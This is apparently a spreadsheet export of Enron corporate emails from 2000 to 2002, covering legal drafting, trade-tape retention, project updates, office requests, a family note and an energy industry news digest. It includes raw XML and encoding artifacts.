Many companies set up limited partnerships for tax purposes, but it is unusual to allow company executives to run them, analyst say. _x000D_
Investors also are upset by the unusually zealous way that Enron has guarded financial information, making it difficult to analyze the company's complex web of businesses. _x000D_
And many are not confident that all the bad news has been released. _x000D_
Analyst M. Carol Coale, who follows Enron and other energy companies for Prudential Securities in Houston, downgraded Enron to a "hold" from a "buy" rating Monday out of such frustration. _x000D_
Coale said she has been getting misinformation or no information out of Enron. _x000D_
But Bob Christensen, energy analyst with First Albany Corp., said that despite Enron's recent difficulties, the bulk of the business remains strong. _x000D_
"I continue to tell investors that 70% of this company's business is growing at a 26% rate, and that was in the third quarter when this country had a very sharp economic slowdown going on," he said. _x000D_
Investors are panicking because of a "bad news story that doesn't reflect reality," said Jon Kyle Cartwright, senior energy analyst with the Raymond James &amp; Associates brokerage firm in St. Petersburg, Fla. _x000D_
"They are the world's largest energy trader, and they are very good at that," Cartwright said. _x000D_
"The reality is that everything is fine here," although more charges, perhaps $500 million worth, are expected in the next few quarters, related to businesses that Enron is selling._x000D_
_x000D_
GRAPHIC: Losing Its Spark / Los Angeles Times; _x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 01:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 12/14/2000 09:19 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Timothy Oxley" &lt;TOxley@winston.com&gt; on 12/14/2000 09:18:28 AM_x000D_
To: &lt;Kay.Mann@enron.com&gt;_x000D_
cc: &lt;robtaylor@andrews-kurth.com&gt; _x000D_
_x000D_
Subject: Re: GE Release_x000D_
_x000D_
I have never seen the language requested before and have not signed off on _x000D_
it.  Rob Taylor and I only discussed the concept because I had never seen a _x000D_
draft of the Consent until a signed copy was delivered to me yesterday._x000D_
_x000D_
&gt;&gt;&gt; &lt;Kay.Mann@enron.com&gt; 12/14/00 08:47AM &gt;&gt;&gt;_x000D_
_x000D_
This language is different that what GE was told was requested before.  I_x000D_
am more comfortable going back to GE with what was requested previously._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Timothy Oxley" &lt;TOxley@winston.com&gt; on 12/13/2000 08:38:52 PM_x000D_
_x000D_
To:   &lt;Kay.mann@enron.com&gt;_x000D_
cc:   &lt;robtaylor@andrews-kurth.com&gt;_x000D_
_x000D_
Subject:  GE Release_x000D_
_x000D_
Pursuant to the request of Rose Engeldorf, the following is the_x000D_
suggested language for insertion into the GE Consent:_x000D_
_x000D_
"Each of GE Packaged Power and GE acknowledge that WestLB is a third_x000D_
party beneficiary of this Consent and shall be entitled to enforce its_x000D_
provisions against GE Packaged Power and GE, respectively, as if a_x000D_
party to this Consent."_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 02:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>LA Times</t>
  </si>
  <si>
    <t>Here is an interesting editorial on Attorney General Bill Lockyer from_x000D_
today's Los Angeles Times._x000D_
_x000D_
http://www.latimes.com/news/comment/20010606/t000047050.html</t>
  </si>
  <si>
    <t>Fri, 13 Oct 2000 07:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Meeting been rescheduled between the governor and Skilling yet?</t>
  </si>
  <si>
    <t xml:space="preserve">Got bounced back first time.  Trying again._x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 10/13/2000 02:49 PM -----_x000D_
_x000D_
	Jeff Dasovich_x000D_
	Sent by: Jeff Dasovich_x000D_
	10/13/2000 02:47 PM_x000D_
		 _x000D_
		 To: James D Steffes/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, Paul _x000D_
Kaufman/PDX/ECT@ECT, Susan J Mara/SFO/EES@EES, Mona L Petrochko/SFO/EES@EES, _x000D_
Sandra McCubbin/SFO/EES@EES, David Parquet/SF/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Meeting been rescheduled between the governor and Skilling yet?_x000D_
_x000D_
FYI._x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 10/13/2000 02:46 PM -----_x000D_
_x000D_
	Maureen McVicker_x000D_
	10/13/2000 02:34 PM_x000D_
		_x000D_
		 To: Jeff Dasovich/NA/Enron@Enron_x000D_
		 cc: skean@enron.com_x000D_
		 Subject: Re: Meeting been rescheduled between the governor and Skilling yet?_x000D_
_x000D_
I checked with Skilling's office and there is nothing scheduled.    The _x000D_
Gov.'s office bascially said "don't call us, we'll call you"._x000D_
_x000D_
_x000D_
     Maureen _x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 Jan 2002 04:36:20 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ryan.lorei@disney.com'})</t>
  </si>
  <si>
    <t>BP</t>
  </si>
  <si>
    <t>Just throwing out some spots for Ken's BP......what do you think about Miami ???  Go'n to Miami,,,Miyamy yamy yamy!_x000D_
_x000D_
Carson</t>
  </si>
  <si>
    <t>Wed, 27 Sep 2000 10:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'wes.colwell@enron.com', 'brian.redmond@enron.com', 'c.thompson@enron.com', 'tim.belden@enron.com', 'janet.dietrich@enron.com', 'sally.beck@enron.com', 'edward.baughman@enron.com', 'bob.crane@enron.com', 'jeff.donahue@enron.com', 'scott.neal@enron.com', 'beth.perlman@enron.com', 'fred.lagrasta@enron.com', 'david.oxley@enron.com', 'colleen.sullivan@enron.com', 'jeffrey.shankman@enron.com', 'raymond.bowen@enron.com', 'phillip.allen@enron.com', 'jordan.mintz@enron.com', 'robert.knight@enron.com', 'christopher.calger@enron.com', 'max.yzaguirre@enron.com', 'hunter.shively@enron.com', 'philippe.bibi@enron.com', 'w.duran@enron.com', 'rob.milnthorp@enron.com', 'joseph.deffner@enron.com', 'greg.wolfe@enron.com', 'john.arnold@enron.com', 'kevin.presto@enron.com', 'scott.josey@enron.com'})</t>
  </si>
  <si>
    <t>Retention Policy on Trading Tapes</t>
  </si>
  <si>
    <t>Effective October 15, 2000, the retention period on tape recordings of trades _x000D_
done by telephone will be reduced from four months to one month.  The tapes _x000D_
regarding significant transactions may be retained for such longer period as _x000D_
approved in writing by both the Head Trader and the General Counsel.  Please _x000D_
propose those significant transactions on which you may wish to retain the _x000D_
tapes, prior to October 15, 2000, since the tapes on conversations older than _x000D_
one month (except with respect to litigation matters) will be destroyed on _x000D_
that date.  If you have any questions, please contact Mark Haedicke or _x000D_
Richard Sanders. _x000D_
_x000D_
John Lavorato and Mark Haedicke</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 09:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>TRV Project Status</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff -_x000D_
_x000D_
As we discussed today, the following is the TRV (Trader Report Viewer) _x000D_
project status:_x000D_
_x000D_
?  TRV is targeted to be implemented by May 15th as scheduled._x000D_
?  TRV development and security setup has been completed and is ready to be _x000D_
presented to the traders. _x000D_
?  Hal and I will meet with Phillip and Kam tomorrow to provide the TRV _x000D_
system and administrator rights review, and to publish  their region's _x000D_
reports._x000D_
?  We will then meet with Darron, David, and Errol (to be scheduled for early _x000D_
next week) to provide the TRV system and  administrator rights review, and to _x000D_
publish their region's reports._x000D_
?   At the conclusion of the review, we will determine we will roll out the _x000D_
training for the remaining team members within each  region (i.e. Region _x000D_
Leads or IT to provide training to the team members)._x000D_
?  Currently TRV is running in the development environment for the review _x000D_
period.  Upon conclusion of the review period, we will  ask for approval and _x000D_
UAT signoff from you in order to transition the system into the Production _x000D_
environment._x000D_
_x000D_
Again, thank you and each of your team members for everyone's help and _x000D_
support on this initiative!  Please let me know if you have any questions. _x000D_
_x000D_
Shirley McDowell_x000D_
TRV Project / IT Project Manager   _x000D_
_x000D_
_x000D_
 _x000D_
  _x000D_
</t>
  </si>
  <si>
    <t>Fri, 20 Jul 2001 13:46:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: Arnold, Matthew _x000D_
Sent: Friday, July 20, 2001 2:00 PM_x000D_
To: Arnold, John_x000D_
Subject: FW: vacation_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Arnold, John _x000D_
Sent: Friday, July 20, 2001 12:08 PM_x000D_
To: Arnold, Matthew_x000D_
Subject: FW: vacation_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Arnold, Matthew _x000D_
Sent: Monday, July 16, 2001 8:46 AM_x000D_
To: Arnold, John_x000D_
Subject: FW: vacation_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Karen Arnold [mailto:klarnold@flash.net]_x000D_
Sent: Sunday, July 15, 2001 3:19 PM_x000D_
To: Arnold, John; Arnold, Matthew_x000D_
Subject: vacation_x000D_
_x000D_
_x000D_
If we are going on a family vacation this year, we need to start planning._x000D_
Now it may be that we all have over expended this year, me on the kitchen,_x000D_
MBA on the house, JDA on the furniture is has bought, is buying or will_x000D_
but, and we may only be able to go to the Woodlands, Fredericksburg, or_x000D_
someplace.  Anyway, we need to do some planning or we will be out of luck._x000D_
August is looking bad for me.  September?  Love, Your Mom</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 06:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Revised - Economist Description</t>
  </si>
  <si>
    <t xml:space="preserve">Rick -- I think this looks much better.   We'll proceed with advertising once _x000D_
I've heard back from you._x000D_
_x000D_
Thanks for your input._x000D_
_x000D_
Lisa_x000D_
---------------------- Forwarded by Lisa Yoho/HOU/EES on 11/15/2000 02:10 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Tony Vasut@ECT_x000D_
11/15/2000 10:40 AM_x000D_
To: Lisa Yoho/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Re: Revised - Economist Description  _x000D_
_x000D_
Sorry!_x000D_
_x000D_
_x000D_
  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Lisa Yoho@EES_x000D_
11/15/2000 09:01 AM_x000D_
To: Tony Vasut/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Revised - Economist Description  _x000D_
_x000D_
tony -- did you re-send the original?_x000D_
_x000D_
_x000D_
_x000D_
Tony Vasut@ECT_x000D_
11/14/2000 02:56 PM_x000D_
To: Lisa Yoho/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Revised - Economist Description_x000D_
_x000D_
Lisa:_x000D_
Let me know how you feel about this version._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
  _x000D_
_x000D_
Thanks,_x000D_
Tony_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Jul 2000 14:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'thomas.suffield@enron.com'})</t>
  </si>
  <si>
    <t>Re: Florida Presentation</t>
  </si>
  <si>
    <t xml:space="preserve">I'm still not sure who has this territory. However, if you need something, _x000D_
please let me know._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thomas Suffield_x000D_
07/18/2000 10:11 AM_x000D_
To: Ted Ryan/Corp/Enron@ENRON, Kay Mann/Corp/Enron@Enron_x000D_
cc: Karen E Carter/NA/Enron@Enron _x000D_
_x000D_
Subject: Florida Presentation_x000D_
_x000D_
Ted:  I believe you missed our Florida "all hands meeting".  Please find _x000D_
attached a copy of the Florida presentation._x000D_
_x000D_
Kay:  are you the legal contact on Florida?_x000D_
_x000D_
Thanks, Thomas._x000D_
---------------------- Forwarded by Thomas Suffield/Corp/Enron on 07/18/2000 _x000D_
10:11 AM ---------------------------_x000D_
_x000D_
_x000D_
Thomas Suffield_x000D_
07/14/2000 10:00 AM_x000D_
To: Marchris Robinson/HOU/EES@EES_x000D_
cc:  _x000D_
_x000D_
Subject: Florida Presentation_x000D_
_x000D_
As per our discussion, please find atached from yesterday's meeting._x000D_
---------------------- Forwarded by Thomas Suffield/Corp/Enron on 07/14/2000 _x000D_
10:01 AM ---------------------------_x000D_
_x000D_
_x000D_
Raimund Grube_x000D_
07/05/2000 06:19 PM_x000D_
To: Tammy R Shepperd/HOU/ECT@ECT, Mary Kay Moore/HOU/ECT@ECT_x000D_
cc: Ben Jacoby/HOU/ECT@ECT, Thomas M Suffield/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Florida Presentation_x000D_
_x000D_
Attached, please find the latest version of the Florida presentation as of _x000D_
6:20 PM on 7/05._x000D_
_x000D_
Please call if you have any questions._x000D_
_x000D_
_x000D_
Raimund D. Grube_x000D_
X-30433_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 2 Nov 2000 23:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Governing Law</t>
  </si>
  <si>
    <t xml:space="preserve">Per my voicemail, could you please help me find the Governing Law(s) for the _x000D_
list attached below for each Counterparty.  _x000D_
_x000D_
Please Note:  the following list of Agreements were not in your file cabinets._x000D_
_x000D_
Thank You,_x000D_
Anthony_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 31 Jul 2000 02:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
---------------------- Forwarded by Steven J Kean/HOU/EES on 07/31/2000 09:=_x000D_
05=20_x000D_
AM ---------------------------_x000D_
From: Tanja Murray@ENRON on 07/28/2000 06:25 PM_x000D_
To: Steven J Kean/HOU/EES@EES_x000D_
cc: =20_x000D_
Subject: Confidential_x000D_
_x000D_
Below find the proposed message that we intend to send to all US employees=_x000D_
=20_x000D_
regarding the alleged "gifting clubs."  I wanted you to be aware of the=20_x000D_
Company's position concerning these "gifting clubs" in the event that your=_x000D_
=20_x000D_
staff was to receive any questions concerning this matter._x000D_
_x000D_
Thank you._x000D_
_x000D_
Kriste Sullivan_x000D_
EB 4861_x000D_
Ext. 37557_x000D_
_x000D_
_x000D_
----- Forwarded by Tanja Murray/Corp/Enron on 07/28/2000 06:19 PM -----_x000D_
_x000D_
=09Kriste Sullivan_x000D_
=09Sent by: Tanja Murray_x000D_
=0907/28/2000 06:14 PM_x000D_
=09=09=20_x000D_
=09=09 To: Cindy Olson/Corp/Enron@ENRON, Rob Walls/NA/Enron@Enron_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: Confidential_x000D_
_x000D_
Below find a draft of the All Employee communication regarding "gifting=20_x000D_
clubs."  Please provide me with your comments._x000D_
_x000D_
Thank you._x000D_
_x000D_
_x000D_
_x000D_
=01&amp;The Company has become aware that Company employees have been solicited=_x000D_
 for=20_x000D_
participation in =01&amp;gifting clubs.=018  These clubs appear to be illegal p=_x000D_
yramid=20_x000D_
schemes.  If you are approached about joining a club but aren=01,t sure if =_x000D_
it=01,s=20_x000D_
an illegal gifting club, contact the Better Business Bureau. =20_x000D_
_x000D_
Please be advised that use of the Company=01,s premises without management=_x000D_
=01,s=20_x000D_
prior approval or use of any of the Company=01,s communication services=20_x000D_
equipment (i.e. email, fax machines, telephones, etc.) for non-business=20_x000D_
related ventures is against Company policy.=018_x000D_
_x000D_
  KKS/tmm_x000D_
_x000D_
_x000D_
Kriste K. Sullivan_x000D_
Enron Corp. Legal_x000D_
1400 Smith, EB 4861_x000D_
Houston, TX  77002_x000D_
(713) 853-7557_x000D_
(713) 646-5847 Fax_x000D_
KSulliv@Enron.com_x000D_
_x000D_
_x000D_
This message may contain confidential information that is protected by the=_x000D_
=20_x000D_
attorney-client and/or work product privileges._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Jun 2000 07:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.ruffer@enron.com', 'mark.frank@enron.com', 'wes.colwell@enron.com', 'jody.pierce@enron.com', 'jim.coffey@enron.com', 'michael.galvan@enron.com', 'lon.draper@enron.com', 'george.mcclellan@enron.com', 'brian.redmond@enron.com', 'edward.ondarza@enron.com', 'c.thompson@enron.com', 'kimberly.hillis@enron.com', 'herman.manis@enron.com', 'david.leboe@enron.com', 'janet.dietrich@enron.com', 'mike.miller@enron.com', 'hope.vargas@enron.com', 'sally.beck@enron.com', 'sheila.glover@enron.com', 'gary.hickerson@enron.com', 'jere.overdyke@enron.com', 'kathryn.corbally@enron.com', 'jeff.kinneman@enron.com', 'jeff.smith@enron.com', 'roger.ondreko@enron.com', 'laura.scott@enron.com', 'jeff.donahue@enron.com', 'cris.sherman@enron.com', 'tammy.shepperd@enron.com', 'david.delainey@enron.com', 'richard.lydecker@enron.com', 'susan.helton@enron.com', 'thomas.myers@enron.com', 'faith.killen@enron.com', 'cheryl.dawes@enron.com', 'james.ajello@enron.com', 'jeffrey.shankman@enron.com', 'brent.price@enron.com', 'raymond.bowen@enron.com', 'rodney.malcolm@enron.com', 'mark.tawney@enron.com', 'jill.louie@enron.com', 'eric.groves@enron.com', 'stanley.farmer@enron.com', 'andrea.reed@enron.com', 'georgeanne.hodges@enron.com', 'christopher.calger@enron.com', 'john.lavorato@enron.com', 'w.duran@enron.com', 'chris.komarek@enron.com', 'rob.milnthorp@enron.com', 'angeles.beltri@enron.com', 'brenda.herod@enron.com', 'kevin.presto@enron.com', 'scott.josey@enron.com'})</t>
  </si>
  <si>
    <t>Mgmt Summary &amp; HotList</t>
  </si>
  <si>
    <t xml:space="preserve">Attached are the Mgmt Summary, Hot List and Metrics based on activity through _x000D_
6/8/00._x000D_
</t>
  </si>
  <si>
    <t>Mon, 24 Apr 2000 09:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.smith@enron.com', 'bryan.hull@enron.com', 'david.baumbach@enron.com', 'lisa.csikos@enron.com', 'steve.venturatos@enron.com', 'pat.clynes@enron.com', "o'neal.winfree@enron.com", 'michael.walters@enron.com', 'rita.wynne@enron.com', 'daren.farmer@enron.com'})</t>
  </si>
  <si>
    <t>Shell Houston Open</t>
  </si>
  <si>
    <t xml:space="preserve">First Come First serve:  _x000D_
_x000D_
I have:_x000D_
10 Shell Houston open badges available. (Let's try to share these as best we _x000D_
can.)_x000D_
10 One Day Passes_x000D_
2 Invitations to Tonights Mardi Gras Party_x000D_
4 Tickets to this Saturday's Beauty n Blues concert._x000D_
_x000D_
This might be a good time to remind you that this week is Secretary's week _x000D_
(since I am holding all the goodies) Just joking Brenda._x000D_
_x000D_
Yvette_x000D_
x3.5953_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Sat, 13 Jan 2001 01:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'louis.soldano@enron.com', 'norma.hasenjager@enron.com'})</t>
  </si>
  <si>
    <t>Request to purchase chair(s) for Susan</t>
  </si>
  <si>
    <t xml:space="preserve">sorry, i left lou off of the message.     _x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 01/13/2001 _x000D_
09:46 AM ---------------------------_x000D_
_x000D_
_x000D_
Drew Fossum_x000D_
01/13/2001 09:45 AM_x000D_
To: Norma Hasenjager/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Request to purchase chair(s) for Susan_x000D_
_x000D_
Lou, do we have any sort of policy on requests like this?  Lee Huber made the _x000D_
same request last year and we gave her the chair (she only wanted one, _x000D_
however).  Norma, any thoughts?  _x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 01/13/2001 _x000D_
09:43 AM ---------------------------_x000D_
_x000D_
_x000D_
DENISE LAGESSE_x000D_
01/12/2001 01:14 PM_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON_x000D_
cc: Susan Scott/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Request to purchase chair(s) for Susan_x000D_
_x000D_
Susan Scott would like authorization to order an Aeron chair for each of her _x000D_
offices - on 47 and 41.  This particular chair is designed to help with back _x000D_
problems, which she has.  Many people at Enron already have this type of _x000D_
chair, but we rarely, if ever, have a surplus because they are so popular.  _x000D_
The cost is $567.77 per chair plus tax.  Please approve the purchase of two.  _x000D_
Thanks!_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 May 2000 05:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: monitoring of equity accounts</t>
  </si>
  <si>
    <t xml:space="preserve">I  would love it if we could meet.  We have made a little bit of headway in _x000D_
this effort, but quite frankly, not much.  In fact, I have seen DASH's that _x000D_
is indicating the purchase of public equity and I am trying to find out who _x000D_
and how etc these are being transacted.  Can you set something up or do you _x000D_
need me to. I will bring somebody from my group to help and learn so we _x000D_
probably need a conference room.  Thanks for keeping this issue alive.  _x000D_
Donna  P.S.  Has Marie moved to EBS or is she still with you?_x000D_
_x000D_
_x000D_
From: Sara Shackleton on 05/23/2000 08:59 AM_x000D_
To: Donna Lowry/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: monitoring of equity accounts_x000D_
_x000D_
Donna:  It's been awhile since we last spoke about advising Enron companies _x000D_
of existing brokerage accounts.  It has also been determined (in legal) that _x000D_
the accounts will remain with ME and not move to Alan A.  I have some _x000D_
temporary assistance in that an A&amp;K lawyer, Jason Peters, is working up here _x000D_
for another few weeks.  I was hoping that we could all meet and put our _x000D_
"project" into action.  Please give me a call and suggest some time when we _x000D_
may meet.  Thanks.  Sara_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 09:36:41 -0800 (PST)</t>
  </si>
  <si>
    <t>Thu, 6 Apr 2000 06:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>I think I might call.  Would you take me our for a free lunch?</t>
  </si>
  <si>
    <t>Wed, 7 Nov 2001 14:53:01 -0800 (PST)</t>
  </si>
  <si>
    <t>NCPA deal review for Nov 01'</t>
  </si>
  <si>
    <t xml:space="preserve">Diana:_x000D_
_x000D_
Today I reviewed NCPA related deals for 11/1-11/6 and found:_x000D_
_x000D_
11/1 =&gt; good_x000D_
11/2 =&gt; somehow the lightload sale side (deal 517676.1) is only showing HE1-HE6 in the scheduling system now.  I wonder if someone deleted HE23-HE24 afterwards (*on the lightload purchase side we have both HE1-HE6 and HE23-HE24, deal 517673.1).  _x000D_
11/3 =&gt; good_x000D_
11/4 =&gt; annuity missing (no power delievered)_x000D_
11/5 =&gt; annuity missing (no power delievered)_x000D_
11/6 =&gt; annuity missing (no power delievered)_x000D_
_x000D_
Please let me know if you could restore the HE23-HE24 for 11/2 back in the scheduling system if they should be there, also please let me know when the missed annuities are entered.  I have also attached my worksheet for your convenient reference._x000D_
_x000D_
 _x000D_
Thanks,_x000D_
Fran Chang_x000D_
West Power Risk Management_x000D_
503.464.7973 (phone)_x000D_
503.464.3740 (fax)_x000D_
            </t>
  </si>
  <si>
    <t>Wed, 16 Jan 2002 20:34:46 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
     Thursday, January 17, 2002  KWI   [IMAGE] HOME  - CONTENT SELECTION   =_x000D_
- MEMBER SERVICES   - ADVERTISING   - PARTNERING   - CONTACT US      [IMAGE=_x000D_
]          [IMAGE]  IN THIS ISSUE     [IMAGE]   [IMAGE]    Daily Edition fo=_x000D_
r paul.d.thomas@enron.com  [IMAGE]     Electric Power News  Restructuring T=_x000D_
oday   RER's eMetrix Load Forecast: CAL ISO   Electric Power News - Top Sto=_x000D_
ries  Electric Power News - Most Requested  Gas Industry News - Top Stories=_x000D_
           Selected Content Not In This Issue  Utility Spotlight - Every Mo=_x000D_
nday Utility Stock Price - Top Gainers - Each Tuesday         [IMAGE]  ELEC=_x000D_
TRIC POWER NEWS     [IMAGE]   [IMAGE]  [IMAGE] [IMAGE] Selected 66 of 66  A=_x000D_
rticles Today!      THESE ARTICLES BROUGHT TO YOU BY     Chartwell covers r=_x000D_
etail energy sales &amp; marketing in their new book,  Energy Sales &amp; Marketing=_x000D_
 2001. It features research on marketing  and selling new products and serv=_x000D_
ices, as well as energy management  technologies. It also covers strategies=_x000D_
 for competitive markets and  effective CRM. View more.. http://www.energyc=_x000D_
entral.com/links/show_mi.cfm?id=3D100383         Top Stories     Bankrupt P=_x000D_
G?asks federal judge for more time to reorganize   Jan 16, 2002 - Associate=_x000D_
d Press Pacific Gas and Electric Co. and California power regulators vented=_x000D_
 their frustration with one another before a federal bankruptcy judge Wedne=_x000D_
sday, as the state sought permission to develop an alternative plan under w=_x000D_
hich PG?would emerge from bankruptcy.  [IMAGE]   Allentown, Pa., Utility Sa=_x000D_
ys It Didn't Try to Control Electricity Prices   By Benjamin Y. Lowe, The P=_x000D_
hiladelphia Inquirer, Jan. 16 PPL Corp. yesterday told state regulators it =_x000D_
did not set prices in the region's wholesale electricity market last year. =_x000D_
 [IMAGE]   FERC to create electricity market monitoring unit   WASHINGTON, =_x000D_
Jan 16 (Reuters) Federal energy regulators on Wednesday detailed plans to c=_x000D_
reate a new market oversight unit to prevent manipulation of U.S. wholesale=_x000D_
 electricity prices and supplies.  [IMAGE]   Enron energy services clients =_x000D_
may take profit hits   By Carolyn Koo, NEW YORK, Jan 16 (Reuters) The light=_x000D_
s won't go off, but companies that relied on Enron Corp. to manage their en=_x000D_
ergy needs and cut their electricity bills may soon find themselves out in =_x000D_
the cold.       Energy Security     US FERC to keep sensitive pipeline maps=_x000D_
 under wraps   WASHINGTON, Jan 16 (Reuters) The Federal Energy Regulatory C=_x000D_
ommission (FERC) on Wednesday said it will continue to restrict public acce=_x000D_
ss to information about U.S. pipeline routes and other sensitive energy-rel=_x000D_
ated sites.      California Crisis     FEATURE-A year after blackouts, Cali=_x000D_
fornia counts cost   By James Jelter, SAN FRANCISCO, Jan 16 (Reuters) A yea=_x000D_
r after the first blackout swept through their state, Californians are tack=_x000D_
ling mountains of debt and litigation raised by last winter's energy crisis=_x000D_
, buoyed by the belief the lights won't go out.       California Senate Pan=_x000D_
el Seeks Depositions from Enron, Accounting Firm   By Andrew LaMar, Contra =_x000D_
Costa Times, Walnut Creek, Calif., Jan. 16 A state Senate committee wants t=_x000D_
o know whether documents destroyed by accountants working for Enron Corp. l=_x000D_
ast fall contained information sought by legislators investigating Californ=_x000D_
ia's electricity market.       PG?ad blasts big California fraud lawsuit   =_x000D_
SAN FRANCISCO, Jan 16 (Reuters) PG?Corp. took out full-page advertisements =_x000D_
in newspapers throughout California on Wednesday, blasting a giant state fr=_x000D_
aud suit against its bankrupt utility unit as a bid to topple the company's=_x000D_
 reorganization plan.       Democratic Commissioners Steamroll Holding-Comp=_x000D_
any Rule Changes   Jan. 16 (California Energy Markets) After Republican com=_x000D_
missioners had put the item on hold, Democratic members of the California P=_x000D_
ublic Utilities Commission on January 9 returned from a closed session to o=_x000D_
verride the hold list, approving far-reaching holding-company regulations t=_x000D_
hat specifically target Pacific Gas &amp; Electric's reorganization plans [I01-=_x000D_
04-002].  Special Offer from this Publisher!     [IMAGE] ADVERTISEMENT    E=_x000D_
NERGIZE YOUR CAREER - The Energy Central Job Center has a new look,  new fe=_x000D_
atures, premier employers and is updated daily! Visit the energy  industry'=_x000D_
s largest on-line job center today:  http://www.energycentral.com/sections/=_x000D_
jobs          Competition &amp; Deregulation     Georgia Power Explores Enterin=_x000D_
g Gas Market   By Matthew C. Quinn, The Atlanta Journal-Constitution, Jan. =_x000D_
16 Georgia Power Co. has a plan to enter the natural gas business by offeri=_x000D_
ng itself as a regulated alternative to the state's unregulated gas markete=_x000D_
rs, the company said Tuesday.       Enron Plays Big Role in North Carolina;=_x000D_
 Deregulation Draws Lobbyists   By Paul B. Johnson, High Point Enterprise, =_x000D_
N.C., Jan. 16 When the debate about reforming the state's electric industry=_x000D_
 reached its peak about two years ago, representatives of the now-bankrupt =_x000D_
Enron Corp. circulated through the halls and meeting rooms of the State Leg=_x000D_
islative Building.      Mergers, Acquisitions &amp; Divestitures     Montedison=_x000D_
, Edison see all non-core ops sold by yr-end   ROME, Jan 16, 2002 (AFX-Euro=_x000D_
pe via COMTEX) --  The Montedison/Edison group expects to have sold all non=_x000D_
-core businesses by the end of the year, said Umberto Quadrino, chairman of=_x000D_
 Edison SpA and vice chairman of Montedison SpA.      Legislation/Regulatio=_x000D_
n     Congress quizzes fired Andersen partner on Enron role   WASHINGTON, J=_x000D_
an 16 (Reuters) - Congressional investigators said on Wednesday they quizze=_x000D_
d fired Andersen audit partner David Duncan about the accounting firm's tie=_x000D_
s to collapsed energy trading giant Enron Corp.       Justice official refu=_x000D_
ses to step aside on Enron   WASHINGTON, Jan 16 (Reuters) The head of the U=_x000D_
.S. Justice Department's investigation of Enron rejected suggestions on Wed=_x000D_
nesday that he should step aside because of his ties to a law firm that had=_x000D_
 represented the giant energy company.       Bush Administration Says Enron=_x000D_
 Calls Were Routine   By Bob Deans, Austin American-Statesman, Texas, Jan. =_x000D_
16 The Bush administration has said the flurry of phone calls Enron Corp. e=_x000D_
xecutives made to senior Cabinet officials last fall were routine communica=_x000D_
tions that take place between the government and corporate America.       S=_x000D_
enate Panel Reviews Enron over Tax Breaks   By John C. Henry, Houston Chron=_x000D_
icle, Jan. 16 Enron Corp., which sought federal tax breaks as the company h=_x000D_
urtled toward bankruptcy last fall, is coming under scrutiny by federal law=_x000D_
makers for possible misuse of corporate tax laws.       White House plays d=_x000D_
own talk of Pitt Enron recusal   WASHINGTON, Jan 16 (Reuters) The White Hou=_x000D_
se on Wednesday played down suggestions that Securities and Exchange Commis=_x000D_
sion Chairman Harvey Pitt recuse himself from the commission's probe of fal=_x000D_
